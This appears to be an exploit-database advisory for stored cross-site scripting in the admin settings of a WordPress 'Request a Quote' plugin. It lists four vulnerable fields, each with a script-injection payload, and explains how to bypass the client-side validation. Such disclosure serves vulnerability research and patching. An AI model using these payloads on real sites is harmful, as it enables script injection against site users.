## https://sploitus.com/exploit?id=WPEX-ID:36E8EFE8-B29F-4C9E-9DD5-3E317AA43E0C
As admin, put the below payloads in the related vulnerable field/s and save them (there is some validation done client side for the Maximum fields, but won't be done server side, so either repeat the request with the payloads, or inject the fields in the web browser and change them to text type)
Affected fields and related payloads:
- Base Slug (request_a_quote_ent_map_list[emd_quote][rewrite]): '><script>alert(/XSS/)</script>
Attachments Section
- Maximum files (request_a_quote_ent_map_list[emd_quote][max_files][emd_contact_attachment]): "><script>alert(/XSS/)</script>
- Maximum file size (request_a_quote_ent_map_list[emd_quote][max_file_size][emd_contact_attachment]): "><script>alert(/XSS/)</script>
- Allowed file extensions (request_a_quote_ent_map_list[emd_quote][file_exts][emd_contact_attachment]): </textarea><script>alert(/XSS/)</script>